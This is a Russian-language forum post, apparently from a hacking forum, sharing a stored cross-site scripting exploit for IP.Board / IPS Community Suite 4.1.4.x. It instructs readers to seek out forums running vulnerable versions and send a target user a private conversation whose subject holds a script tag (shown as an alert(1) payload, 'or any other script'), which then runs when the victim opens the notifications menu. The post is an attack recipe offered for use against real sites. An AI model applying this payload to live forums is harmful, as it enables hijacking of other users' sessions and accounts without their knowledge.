Загрузка...

IP.Board 4.1.4.x - XSS Vulnerability

Тема в разделе Веб уязвимости создана пользователем RaysMorgan 13 дек 2015. 3413 просмотров

Загрузка...

Скопировать BBCode

RaysMorgan Автор темы 13 дек 2015 https://lolz.live/support-tickets/open 51 797 7 мар 2013
IPS Community Suite 4.1.4.x XSS уязвимость

# Exploit Title: IP.Board 4.X Stored XSS

# Date: 27-08-2015

# Software Link: https://www.invisionpower.com/

# Exploit Author: snop.

# Contact: http://twitter.com/rabbitz_org

# Website: http://rabbitz.org

# Category: webapps
Нажмите, чтобы раскрыть...

Ищем форумы версии IPS меньше или 4.1.4.x
Пишем смс (conversations/) нужному пользователю, в тему письма пишем:

<script>alert(1)</script>

Код

<script>alert(1)</script>

Ну или любой другой скрипт. Когда пользователь откроет меню с оповещениями, этот скрипт выполнится у него на странице.
13 дек 2015 Изменено

Вы должны войти или зарегистрироваться, чтобы ответить.

Top